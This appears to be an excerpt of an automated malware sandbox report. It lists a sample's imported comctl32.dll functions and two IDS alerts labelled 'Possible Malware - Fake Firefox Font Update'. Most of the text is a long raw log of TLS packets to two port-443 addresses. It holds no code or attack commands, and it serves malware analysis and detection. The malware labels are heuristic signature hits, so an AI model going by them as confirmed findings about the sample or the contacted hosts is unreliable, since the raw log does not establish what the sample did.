                                                                comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-12-19T07:57:54.994455+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649710172.217.17.46443TCP
                                                                2024-12-19T07:57:57.808246+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649712172.217.17.65443TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 19, 2024 07:57:53.256944895 CET49709443192.168.2.6172.217.17.46
                                                                Dec 19, 2024 07:57:53.256993055 CET44349709172.217.17.46192.168.2.6
                                                                Dec 19, 2024 07:57:53.257168055 CET49709443192.168.2.6172.217.17.46
                                                                Dec 19, 2024 07:57:53.257220984 CET49709443192.168.2.6172.217.17.46
                                                                Dec 19, 2024 07:57:53.257325888 CET44349709172.217.17.46192.168.2.6
                                                                Dec 19, 2024 07:57:53.257450104 CET49709443192.168.2.6172.217.17.46
                                                                Dec 19, 2024 07:57:53.289570093 CET49710443192.168.2.6172.217.17.46
                                                                Dec 19, 2024 07:57:53.289624929 CET44349710172.217.17.46192.168.2.6
                                                                Dec 19, 2024 07:57:53.289782047 CET49710443192.168.2.6172.217.17.46
                                                                Dec 19, 2024 07:57:53.294461012 CET49710443192.168.2.6172.217.17.46
                                                                Dec 19, 2024 07:57:53.294481993 CET44349710172.217.17.46192.168.2.6
                                                                Dec 19, 2024 07:57:54.994209051 CET44349710172.217.17.46192.168.2.6
                                                                Dec 19, 2024 07:57:54.994455099 CET49710443192.168.2.6172.217.17.46
                                                                Dec 19, 2024 07:57:54.995271921 CET44349710172.217.17.46192.168.2.6
                                                                Dec 19, 2024 07:57:54.995359898 CET49710443192.168.2.6172.217.17.46
                                                                Dec 19, 2024 07:57:55.000202894 CET49710443192.168.2.6172.217.17.46
                                                                Dec 19, 2024 07:57:55.000212908 CET44349710172.217.17.46192.168.2.6
                                                                Dec 19, 2024 07:57:55.000436068 CET44349710172.217.17.46192.168.2.6
                                                                Dec 19, 2024 07:57:55.048629045 CET49710443192.168.2.6172.217.17.46
                                                                Dec 19, 2024 07:57:55.086813927 CET49710443192.168.2.6172.217.17.46
                                                                Dec 19, 2024 07:57:55.127327919 CET44349710172.217.17.46192.168.2.6
                                                                Dec 19, 2024 07:57:55.893996954 CET44349710172.217.17.46192.168.2.6
                                                                Dec 19, 2024 07:57:55.896081924 CET44349710172.217.17.46192.168.2.6
                                                                Dec 19, 2024 07:57:55.896876097 CET49710443192.168.2.6172.217.17.46
                                                                Dec 19, 2024 07:57:55.959990978 CET49710443192.168.2.6172.217.17.46
                                                                Dec 19, 2024 07:57:55.959990978 CET49710443192.168.2.6172.217.17.46
                                                                Dec 19, 2024 07:57:55.960020065 CET44349710172.217.17.46192.168.2.6
                                                                Dec 19, 2024 07:57:55.960031986 CET44349710172.217.17.46192.168.2.6
                                                                Dec 19, 2024 07:57:56.110933065 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:57:56.110951900 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:57:56.111043930 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:57:56.111375093 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:57:56.111383915 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:57:57.808137894 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:57:57.808245897 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:57:57.809983015 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:57:57.809993029 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:57:57.810297966 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:57:57.812427044 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:57:57.855360985 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.025772095 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.025913954 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.038964033 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.039084911 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.063004971 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.063112020 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.145087957 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.196548939 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.196569920 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.221569061 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.221654892 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.221673965 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.231309891 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.231400967 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.231416941 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.240763903 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.240820885 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.240842104 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.251086950 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.251152039 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.251173019 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.264830112 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.264877081 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.264908075 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.277611971 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.277673006 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.277698994 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.291691065 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.291749954 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.291768074 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.305089951 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.305144072 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.305151939 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.324044943 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.324347019 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.324362040 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.332250118 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.332330942 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.332344055 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.345926046 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.346000910 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.346015930 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.356493950 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.356601000 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.356618881 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.378472090 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.378571033 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.378592014 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.409810066 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.409863949 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.409893036 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.417320967 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.417404890 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.417429924 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.419270039 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.419327021 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.419339895 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.430830002 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.430903912 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.430929899 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.441601038 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.441684008 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.441708088 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.452512980 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.452589035 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.452590942 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.452619076 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.452663898 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.462523937 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.472932100 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.473018885 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.473057985 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.482821941 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.482903957 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.482937098 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.492824078 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.492902040 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.492938042 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.502839088 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.502912045 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.502943993 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.513050079 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.513132095 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.513164043 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.522730112 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.522783995 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.522821903 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.532907009 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.532984018 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.532988071 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.533015966 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.533057928 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.541719913 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.550430059 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.550549984 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.550558090 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.550597906 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.550647020 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.551882029 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.559129953 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.559205055 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.559232950 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.567725897 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.567828894 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.567858934 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.578345060 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.578430891 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.578459978 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.583877087 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.583960056 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.583986044 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.592750072 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.592823029 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.592849016 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.597317934 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.597383976 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.597409964 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.604137897 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.604207039 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.604235888 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.609513044 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.609596968 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.609625101 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.614404917 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.614579916 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.614607096 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.619645119 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.619765043 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.619788885 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.624947071 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.625005960 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.625025988 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.630218029 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.630254984 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.630280972 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.630306959 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.630348921 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.635016918 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.640160084 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.640230894 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.640235901 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.640264034 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.640306950 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.645822048 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.650253057 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.650321007 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.650346994 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.655174971 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.655236006 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.655261040 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.660249949 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.660281897 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.660375118 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.660397053 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.660444021 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.665077925 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.669889927 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.669958115 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.669986010 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.674851894 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.674926996 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.674931049 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.674957991 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.675000906 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.679698944 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.684798002 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.684868097 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.684894085 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.689326048 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.689398050 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.689424038 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.694948912 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.695014000 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.695015907 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.695044041 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.695089102 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.698564053 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.704894066 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.704962015 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.704988956 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.708146095 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.708219051 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.708235025 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.714744091 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.714819908 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.714838982 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.717058897 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.717114925 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.717123985 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.726453066 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.726494074 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.726577997 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.726598978 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.726675987 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.727054119 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.733742952 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.733831882 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.733840942 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.733853102 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.733930111 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.734846115 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.742511034 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.742548943 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.742614985 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.742641926 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.742717028 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.743561983 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.743662119 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.743704081 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.743717909 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.750926018 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.750984907 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.751008034 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.752221107 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.752274036 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.752290010 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.760025978 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.760077953 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.760098934 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.761048079 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.761090040 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.761106014 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.767689943 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.767741919 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.767762899 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.768708944 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.768753052 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.768764973 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.775691986 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.775747061 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.775768042 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.776750088 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.776793003 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.776806116 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.782526016 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.782577038 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.782597065 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.783982992 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.784029007 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.784044981 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.789108038 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.789153099 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.789172888 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.791455030 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.791557074 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.791574001 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.795855045 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.795909882 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.795931101 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.798824072 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.798882008 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.798898935 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.802072048 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.802124977 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.802143097 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.805489063 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.805562019 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.805581093 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.808917046 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.808971882 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.808990955 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.812072039 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.812133074 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.812150955 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.815721035 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.815784931 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.815803051 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.818691969 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.818773985 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.818800926 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.821787119 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.821844101 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.821862936 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.826324940 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.826380968 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.826400042 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.830018997 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.830082893 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.830101013 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.831504107 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.831578016 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.831593037 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.833910942 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.833965063 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.833981037 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.837397099 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.837454081 CET49712443192.168.2.6172.217.17.65
                                                                Dec 19, 2024 07:58:01.837471962 CET44349712172.217.17.65192.168.2.6
                                                                Dec 19, 2024 07:58:01.842489958 CET44349712172.217.17.65192.168.2.6
